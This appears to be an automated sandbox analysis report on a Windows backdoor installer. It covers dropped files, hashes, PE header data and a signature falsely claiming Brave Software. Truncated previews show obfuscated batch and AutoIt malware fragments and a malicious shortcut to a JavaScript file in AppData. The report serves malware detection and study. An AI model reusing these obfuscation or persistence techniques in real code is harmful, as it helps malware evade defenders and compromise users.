                                                    Preview:Set Brief=o..tBPocket Loading Fairy Ethernet ..WcIdentifies Ghz Continent Parameter Everybody ..ZHLibrarian Loans ..nZSox Dry ..JEAggregate Board Denied Greatly Effective Roommate Tampa Emirates ..EWUsSn Clara ..FsAnMasters Minds Explicitly Tyler Preston Greensboro Landscape ..wjOriental Help Duke Virtue Derived Alan Imports Boolean ..nWECab Streams Engineer ..nFarFloor Mediterranean Polished Automation ..Set Forecasts=6..PKDAssignments Psychiatry Pushed Mark Converter Mesh Model ..cipGAfterwards Shall Specifics Bicycle Sometimes Merry Highest Tape Rich ..rLColumn Pipes Fraction ..COzDerek Hewlett Causing Retail Interpreted Tragedy Alot Instructions Piece ..oWApproaches Medal Demands Gpl Ware Cartridges Central ..Set Signal=v..HQWToday Lp Scan Newly ..hrOPrivileges Fatal Frequency Partner ..cyXScreensaver More Cambodia Breeds Buried Das Modern Parks Cu ..XWUpcoming Managed Lycos Butt Tu ..IMJGClause Martin Article ..mNxManga Request ..Set Alliance=9..PcAirports Ron Allocation Worlds Sn
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with very long lines (1047), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16631
                                                    Entropy (8bit):5.03845012402483
                                                    Encrypted:false
                                                    SSDEEP:384:qGCv/Va67w3ovnAP+k0YCFxFngvMdP0t1jEdKo/TeS3A/UD:Ev/VaAXAmOCdYMd+IbTTv
                                                    MD5:374D1802B678505470AF77CC3FC02DFC
                                                    SHA1:44A6E2EA73DE59223D6A52C0D2447AFD2951BA3D
                                                    SHA-256:41E793CFB1B80F7FBF67DC2F2C00FD64DD37EB149F9C096C53A9024CA8BE7636
                                                    SHA-512:F2B07757D20526188A112B6599DA04FDAF7D0CC18EB1DB9E12C81711537E5324B5DC617F96D4D92E51D6C0E1C274677B3F2E294A00F5D7AA74BBFE5AA01A7E5D
                                                    Malicious:false
                                                    Preview:Set Brief=o..tBPocket Loading Fairy Ethernet ..WcIdentifies Ghz Continent Parameter Everybody ..ZHLibrarian Loans ..nZSox Dry ..JEAggregate Board Denied Greatly Effective Roommate Tampa Emirates ..EWUsSn Clara ..FsAnMasters Minds Explicitly Tyler Preston Greensboro Landscape ..wjOriental Help Duke Virtue Derived Alan Imports Boolean ..nWECab Streams Engineer ..nFarFloor Mediterranean Polished Automation ..Set Forecasts=6..PKDAssignments Psychiatry Pushed Mark Converter Mesh Model ..cipGAfterwards Shall Specifics Bicycle Sometimes Merry Highest Tape Rich ..rLColumn Pipes Fraction ..COzDerek Hewlett Causing Retail Interpreted Tragedy Alot Instructions Piece ..oWApproaches Medal Demands Gpl Ware Cartridges Central ..Set Signal=v..HQWToday Lp Scan Newly ..hrOPrivileges Fatal Frequency Partner ..cyXScreensaver More Cambodia Breeds Buried Das Modern Parks Cu ..XWUpcoming Managed Lycos Butt Tu ..IMJGClause Martin Article ..mNxManga Request ..Set Alliance=9..PcAirports Ron Allocation Worlds Sn
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):67584
                                                    Entropy (8bit):4.889503128449791
                                                    Encrypted:false
                                                    SSDEEP:384:0RD9HPmPuki09PrOa3HwwuBcozc/mwftIQXoSpu8888888888888888888888889:qD9vmPukxhSaAwuXc/mex/ST
                                                    MD5:49141FA1580FF171C93AAD4EB541DDAB
                                                    SHA1:E7D96F4358600E4AFC85460733DF06C7598C81B4
                                                    SHA-256:A6F110CAEB2C931BAD058BCA3780DD4BCD4144AB16DEA37553A859CAA528B63E
                                                    SHA-512:806D7CE5D8888AD7B55C45220E92837E69902FC483D08C12D5D899398986A88DF9663DEA79D3F18E355CB8EBE239AFFBA015B5C9F33D1EE9E08E501F7D26EFA7
                                                    Malicious:false
                                                    Preview:.......................?.......?.......B.......B.................x.P.D.?X...1..=.......................................?.......?......................0C......0C.....................................5@=.)d....U.5j..%..5...j.?...~...@5.w..z..A..lzZ?..............................|?..Q-8.>=....W.?.0...k8=....p.?...x.9=..>...?.pn...5=..Y...?....Q*.=..c....??...b6.=...Y...?.T.?...=.....>.?....W.!=.@.-32.?.D...z.=...p.(.?vP.(...=.`.....?.US.?.>=..e....?.g....7=.`.'..?.b../=...^s..?.}.#...=..J.wk.?zn.....=...N..?.LN...9=.@$".3.?5Wg4p.6=...T...?.Nv$^.)=....&.?....)..<..l..B.?.M....%=.`j....?.w....*=. <.m.?E...2=...>..?....E..=..t.?..?.......=..O..Q.?.w(@...<....0..?Ac....0=.Py.p..?dr.y?..=...St).?4K....>=....$..?Qh.BC .=.0..ub.?-.....0=.......?.a>-..?=.......?...,..<..(lX .?.T@b. ==.P.....?.3.h,.%=...f.?.?.#.... =..V....?....6=.....Y.?...z. $=...G...? $.l.35=.@...n.?.[+...3=..R...?s.dLi.==.p.|..?r.x"#.2=.@.....?|.U...2=..l...?r..F..=...a...?.....4.=....Y..?sl.#{ =.`~R=..?
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):86016
                                                    Entropy (8bit):6.0786986206709335
                                                    Encrypted:false
                                                    SSDEEP:1536:pYfv2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNI:pC2jfTq8QLeAg0Fuz08XvBN
                                                    MD5:0CEC2E416A4658BB57E658D166BA8A96
                                                    SHA1:C746A3070DE12EF164E8622C74D0A0857AB7CF4E
                                                    SHA-256:92A2B4A8A9044997C5C3A11A1FDAF1A446ABA5248BF02D125D9BA8C1F3F06C4C
                                                    SHA-512:6257914987A32213EA7ABCE7AE7FC042E1C2AB7009DD7206BA7B8B22FFE13D22B0BA233C668AD97999FF3F4EBF988CD9C8B1C66088107BB40285F01DC1F61FEE
                                                    Malicious:false
                                                    Preview:...1.O..t$$;......... ........;...................tY......tH......t.......u!Q............u.Q.w.....f.......W.u.jN.u...x.I._^..]........................u........w.....j.j.h.....7..H.I..i.............................=.....S.....d.....{.....j.P.D$...\.I........a...f... ..V...3.Vj.h.....t$ ..H.I.....:....D$X.D$TPVh>....t$ .D$d......H.I.........V.t$|....................d)M.j.Y;........5T)M........t..|$.9x..}.u........;G.t.A;.~.;..........jO...pT.G.P.4.....3.f......3.@.....5..I.j...f....{...j...f....n...j.j.h.....7..H.I.j.......I.3.f.......M......P.w.......4...3.Vj.h.....7..H.I..........D$X.D$TPVh>....7.D$d......H.I..........G4;G\..................................................u...........i......................w..D$.P.D$.PV.S.......}....T)M..L$.j......f.G.f.......w........T)M..T$.......x(...A....5.)M.. )M........$;.t.P........T)M..T$....h..I..........0)M..w.h0....7..H.I......3.PPP.5.)M.....I.j.j.3.V.5.)M.....I..u.....I..E..L$(..)M..t$(.t$0.D$4......B...E..L$@F.D$(h..L..t$8.B...V
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:ASCII text, with very long lines (1261), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):195376
                                                    Entropy (8bit):5.300847446916815
                                                    Encrypted:false
                                                    SSDEEP:3072:OAE6MKMiRL9Ug9hkB6BZPrm3mO/u/CB0jse5:9RL9Ug9hkB6BBq3VG/CB0jse5
                                                    MD5:B7F27A133E90AE9A58E2559C9CAF9759
                                                    SHA1:39B6E7DE5C6DC0252F9A05B308BF079E21E4872D
                                                    SHA-256:3E0D772FAA0819C04B8E5C97B4FD02A78015B3B1D69AF0159F875E37F60BBB00
                                                    SHA-512:6E696B4AC26EEAF56637EF52653F85AB7283BB2C7B87924A86EC2C180D9903AAA9B1F2A8B986477A7B25C545AFD918841E335223F76B70E66E7D43DCEFFF6BA9
                                                    Malicious:false
                                                    Preview:OSTINGS = Ceiling(3143)..ExitLoop..EndSwitch..WEnd..$effecteducatedstem = '26019122842798858030136285543328774143572933119460841099093568963'..While 222..$weightviacids = 575..Switch $weightviacids..Case 573..IsDeclared(Controversial("108z127z123z108z121z117z104z115z42z122z108z106z118z117z107z122z42z122z123z121z118z114z108z42z105z112z42",13-6))..Floor(278)..Ceiling(8159)..MemGetStats()..ObjGet(Controversial("83z111z109z110z122z127z67z86z108z67",7-1))..ProgressOff()..$weightviacids = $weightviacids + 452063/452063..Case 574..Exp(5002)..Cos(6857)..Cos(3355)..Log(5663)..Exp(3935)..Log(1098)..$weightviacids = $weightviacids + 951696/951696..Case 575..$DistrictGovernanceReplacing = Chr(8108)..ExitLoop..EndSwitch..WEnd..EndFunc..While 275..$IraqBritainFestivals = 516..Switch $IraqBritainFestivals..Case 515..MemGetStats()..Exp(9296)..IsDeclared(Controversial("89z76z85z87z88z68z79z79z92z38",5-2))..Cos(5352)..$IraqBritainFestivals = $IraqBritainFestivals + 848554/848554..Case 516..$solararrange
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):243712
                                                    Entropy (8bit):6.577865735084548
                                                    Encrypted:false
                                                    SSDEEP:6144:1K5vPeDkjGgQaE/loUDtf0accB3gBmmLsiS+SAs:uvG4waEqOfFfB3gBTQ+SAs
                                                    MD5:0FE23AAA844275CC69153C1C530F056A
                                                    SHA1:6E7FD65663CFA44BA68C8367A1C415E999CB8371
                                                    SHA-256:19942D356EC90F076D6EDA272030D4C341877FD7DF58FB7FF4C804BDDBF01D99
                                                    SHA-512:E163B670FA69E5E540D0B9904D72F11F6F21B3F72D757D4CF96EDF6D8BC8D4E47DBB61A1483AAE979FEC31F41FF55D4E5A017FFE7B22E857787BD96F397BE1D3
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):273408
                                                    Entropy (8bit):6.660024266194904
                                                    Encrypted:false
                                                    SSDEEP:6144:zHS3zcNPj0nEo3tb2j6AUkB0CThp6vmVnjphfhnvO5bLezWWt/Dd314V14ZgP/:zy3zcNPjmlGUkiCTD6vmVnNO5bLexRMX
                                                    MD5:1F22516DB88C817A0A2690AE44D0D5A1
                                                    SHA1:941957208145B05374152EEBCEB4B1E27AC567B6
                                                    SHA-256:D8B1CE1A6DD67094E5A6B1C2B48115D561E7E012079BE031B48F1791A2ACBE12
                                                    SHA-512:B46A51743DCC7E52BC00CBEEF2034D6568C93B09BCDF7BB86298BBEAA0A2FC4C9D4D5838EB545F263FC15D09A578AD9B57CB853D93667CADF8C51E8AE36A686A
                                                    Malicious:false
                                                    Preview:.t...............Q.r...F.............:...........g.......{E..$..zE.......wZ.$..{E..C.....IM....t..J.j..U..h....m.........R.T^...........+........@.......;.t.......................G..p........v.....{........S...BP.......V.E...P....;.t.P....I...M..H......................R.......`....R..X........G..p...l....v..d....O..q.........Q.H...w.........6q..P.Kn.....D......T..........[..........G..p.......v........P....E....P..;...........;E......................;...C........K....t#.J.j..U...,...m.....U..........x...R.\...U.......+.U..`......@..U..S....;.t....U..D......U..:...H...wr.$.0{E..F..........+K....t(.J.j..U..J,...m....E...................R.&\........................@......>.t................G..p........v.........G..p........v.................$.X{E....p..Z......j..6..............P..p.I.j......p../......j..6.i......r....K..(F..j..R......\......k..j..=......G...Q....<.........2.....j....'.................E..j.S.q..............u....[..m....I..p
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4184
                                                    Entropy (8bit):7.6308247335047215
                                                    Encrypted:false
                                                    SSDEEP:96:VTOL+Q3IuzfJFFy4EDzHy5Xz+ppo+zAbQ6YhbBwGKGP5h3g:VC+Q3ISVSWMZMQ3rw
                                                    MD5:3CBF1D6D00412611D1C10072A5608AE7
                                                    SHA1:368A8A3592CC335ABA9E99E8C4BB716F5228DF49
                                                    SHA-256:181C602909F69F5524318810AD257EEB3F8831E34F826E5DABF3A797DA1FFFED
                                                    SHA-512:39FDB41CD9034F53F1A4E0863D8AD0C3AABB8F0B0F91B49DD51987DA6A71BF171302409C1F118FCEB7285AAAF816C977B8F432D616A5F05A8763142A5F352817
                                                    Malicious:false
                                                    Preview:....?.O5...7.R.%4...g....Iz.....)....].C.t.p(..{.*......o....mV....>$.g&..........{.g..X...A..U.n...L.K..B.o...6.d.......f...!....#....4D....Ig....Z..f.3...%.qn.].L`<.....r....B.M.&.w...W...a.&...M.d.E...?T..v..lj.."\....).K...7t...f.4s..}|^..=....P.m.W.~.7.k...........)0..%0...U...........0...U.......0.......0...U.........i...WE93..@...e.0...U.#..0....l..............gS.0>..+........2000...+.....0.."http://ocsp2.globalsign.com/rootr606..U.../0-0+.).'.%http://crl.globalsign.com/root-r6.crl0G..U. .@0>0<..U. .0402..+........&https://www.globalsign.com/repository/0...*.H................Wg+B_......(.V.L....p......:`3.9..k.@I%............A.O....#...K.$..D........Ve.......a.FH...gz..J.b....4HEU...J.^..r.qvp.....7W......8.X..~.n.&...*..Hdi/..r..$KtZ}r.5..W......L...SL.....IUOu..oJ..j....0N..s.^....}K.,..k...Y7..,.E..n.u....[/..=}..0...{|...Q.....0.QV`.|.="...$S'...H.',y.<.....>.J.!.b...0....H'|.uB.k..k...X4...P..{...H.+U..% ..Q..c...lraJ..C..W..<
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:ASCII text, with very long lines (943), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):288768
                                                    Entropy (8bit):5.191601948993769
                                                    Encrypted:false
                                                    SSDEEP:3072:TaDj35Gv5njzfd4eUvXoa8eaWn17DmlZ5Vw:TaDj35GRl4eYXp8eaEC5Vw
                                                    MD5:545E573943B2D77F96AAF83A4C90468D
                                                    SHA1:CA20A8FF17C84969B352ADFB2911C9C365C731DC
                                                    SHA-256:66DBD0BD2AC4AE854AC15B01EF61265093DA7E4534DD630A5955D8879B155BC7
                                                    SHA-512:700D03B06CDA42B07F97C238EC8E7C1CABDA1AEC1C85CBFB8D0145F67FD3DA9D0E4F11FF8C6AEAF24806600E9016366C4566C29CE05D2325802A045BE90C3F8C
                                                    Malicious:false
                                                    Preview:..Func BagsObserveLindsayRegistration($LPSYMANTEC, $LIMITATIONCONSPIRACYANNOTATEDBOND, $MANCHESTERVIEWINGACRE, $ExpandingTaiwan, $performtomatoletboring)..$GOVERNMENTDISTINCTION = '459283316547'..While 502..$preventingfixesexpanding = 429..Switch $preventingfixesexpanding..Case 428..Log(7223)..MemGetStats()..ObjGet(Controversial("83z107z103z121z123z120z107z115z107z116z122z121z100z76z107z114z114z117z125z100",7-1))..Floor(479)..PixelGetColor(Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1), Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1))..DirGetSize(Controversial("106z111z117z102z115z98z100z117z34z118z116z99z34z106z111z34z101z102z103z102z111z101z34",1-0))..Ceiling(9421)..ProgressOff()..$preventingfixesexpanding = $preventingfixesexpanding + 198328/198328..Case 429..$occursaluminiumnamely = Floor(382)..ExitLoop..Case 430..ObjGet(Controversial("70z81z89z80z78z81z67z70z34",2-0))..DirGetSize(Controversial("111z108z115z107z52z119z118z121z123z121z104z1
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):46080
                                                    Entropy (8bit):6.825887703010521
                                                    Encrypted:false
                                                    SSDEEP:768:c+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GH:c+9BGmdATGODv7xvTphAiPChgZ2kOEH
                                                    MD5:CB0CF96099E0CD964CCC2003CE264D93
                                                    SHA1:2D15DB969842A6B196336FB1BAF6CA38BE482A59
                                                    SHA-256:520481555DD6940947DD602F3DB5A162BA0F7D8CB201C01EB4124FDF70645D88
                                                    SHA-512:ADE03ECBBDFC1F99D5E364B2A2B5933A243709B1F73F3AAA77E5634115B32FD262026902CAB965B39438E7080E33EACDC45F8D8101AB95981A6E97A6F5B67B7B
                                                    Malicious:false
                                                    Preview:...............'...................................................................................................................(...................................................................................t...................................................................................................t...........................................................................................................................................................................................................................................................................................................k...................................................................k.......................................................................................................................................W.........................................W....................................................................................?................................................?..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):95
                                                    Entropy (8bit):4.9119902196603284
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQaFyw3pYo0nacwRE2J5gxMLQK9n8zfy:HRYF5yjocNwi23gern8zfy
                                                    MD5:D96773F48A1A7C708BB89865AE2C9B0D
                                                    SHA1:F6615DDB6E67985D43EF286BA5339B6C2A45888E
                                                    SHA-256:DAA97D2D532DA00B2614F33A0D9A08AC8417146A493ADCEEF4F7F40C1C26F695
                                                    SHA-512:F67C0AA879B9346949544B464DFD2F0DE11C2C8B84A93FA2B75FF4947498C725D983CD029E902D1E2FD4150D2CA3981B61D6734F095D88C135942600A0F0108B
                                                    Malicious:true
                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" ..
                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):2464
                                                    Entropy (8bit):3.247458013443636
                                                    Encrypted:false
                                                    SSDEEP:24:QOaqdmuF3rVW+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxZ:FaqdF7VW+AAHdKoqKFxcxkFfw
                                                    MD5:5C8971C03F58B451BCDB44CB4896E96D
                                                    SHA1:FF97CBF2DC1A939E23CE0336511D79AFD6966B8E
                                                    SHA-256:1AC32F9C7681FE6112B36409250508735CA8904797D86B906545256AD2FFEDB7
                                                    SHA-512:5C3D71475D303C3B3322ECB2A5F85EBFDFCC6D0329C9399EB62EEC331608EC4D2AD380820F6DA8FCFCC852E016F1A9507DDCA79B0EBC0B80736DDCDA79D727DB
                                                    Malicious:false
                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. M.a.r. .. 2.9. .. 2.0.2.4. .1.3.:.1.1.:.0.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):0.8352444090222729
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File size:10'515'536 bytes
                                                    MD5:63b3dd980ac9a06fd167b0df8121c979
                                                    SHA1:eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
                                                    SHA256:44d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
                                                    SHA512:8baabed3323abdbc172f4fe3fa107e12ff6296d0f86efa85ae76258a83a8102e6c50697478a0571692262dc7c24b56f6de8866e474a7d731ef0e559add018ea4
                                                    SSDEEP:24576:L3BBo+T4XO1X9neVwSxGMOZycff+pTppi:bU+Th/MknAdW
                                                    TLSH:D3B623808AA49825ED53AE720FE06B3B5E75BAE61CE2C8E32701B141DD777435E1E7D0
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....
                                                    Icon Hash:e0dcece4c4e47858
                                                    Entrypoint:0x40350a
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                    Signature Valid:false
                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                    Signature Validation Error:The digital signature of the object did not verify
                                                    Error Number:-2146869232
                                                    Not Before, Not After
                                                    • 06/06/2023 02:00:00 08/08/2024 01:59:59
                                                    Subject Chain
                                                    • CN="Brave Software, Inc.", O="Brave Software, Inc.", L=San Francisco, S=California, C=US
                                                    Version:3
                                                    Thumbprint MD5:16D12EA31FCCA2DB434A4CE2764212FB
                                                    Thumbprint SHA-1:8903F2BD47465A4F0F080AA7CEEC31A31B74DE42
                                                    Thumbprint SHA-256:9422AAD6EED2524B47A4E58D835AC34009EA3B76DD25155EFCCBD0CDB6C1EE88
                                                    Serial:031543E76CA971575EEDF22AA3719DCC
                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 000003F4h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebx, ebx
                                                    push 00008001h
                                                    mov dword ptr [ebp-14h], ebx
                                                    mov dword ptr [ebp-04h], 0040A2E0h
                                                    mov dword ptr [ebp-10h], ebx
                                                    call dword ptr [004080CCh]
                                                    mov esi, dword ptr [004080D0h]
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    push eax
                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                    mov dword ptr [ebp-2Ch], ebx
                                                    mov dword ptr [ebp-28h], ebx
                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                    call esi
                                                    test eax, eax
                                                    jne 00007F3CFD47658Ah
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                    push eax
                                                    call esi
                                                    mov ax, word ptr [ebp-0000012Ch]
                                                    mov ecx, dword ptr [ebp-00000112h]
                                                    sub ax, 00000053h
                                                    add ecx, FFFFFFD0h
                                                    neg ax
                                                    sbb eax, eax
                                                    mov byte ptr [ebp-26h], 00000004h
                                                    not eax
                                                    and eax, ecx
                                                    mov word ptr [ebp-2Ch], ax
                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                    jnc 00007F3CFD47655Ah
                                                    and word ptr [ebp-00000132h], 0000h
                                                    mov eax, dword ptr [ebp-00000134h]
                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                    mov dword ptr [007A8B18h], eax
                                                    xor eax, eax
                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                    movzx eax, ax
                                                    or eax, ecx
                                                    xor ecx, ecx
                                                    mov ch, byte ptr [ebp-2Ch]
                                                    movzx ecx, cx
                                                    shl eax, 10h
                                                    or eax, ecx
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000x6398.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xa000000x7450
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x66700x6800947cb8a43bf8f4be84b88dc77764312eFalse0.6679311899038461data6.436002641218711IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x139a0x1400691f0273dad50ec603f6fedf850b58eeFalse0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x39eb780x60069d435a1d4e9efa1d5d00d6c3645c91eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x3a90000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x3b90000x63980x6400eb64a37b7d853d8f767ba985d207d8d9False0.6687109375data6.1069191723881255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x3b92200x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.47874288039056145
                                                    RT_ICON0x3bb8880x1f7bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0013649336145924
                                                    RT_ICON0x3bd8080x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.51775956284153
                                                    RT_ICON0x3be9300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6604609929078015
                                                    RT_DIALOG0x3bed980x100dataEnglishUnited States0.5234375
                                                    RT_DIALOG0x3bee980x11cdataEnglishUnited States0.6056338028169014
                                                    RT_DIALOG0x3befb80x60dataEnglishUnited States0.7291666666666666
                                                    RT_GROUP_ICON0x3bf0180x3edataEnglishUnited States0.8064516129032258
                                                    RT_MANIFEST0x3bf0580x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                    DLLImport
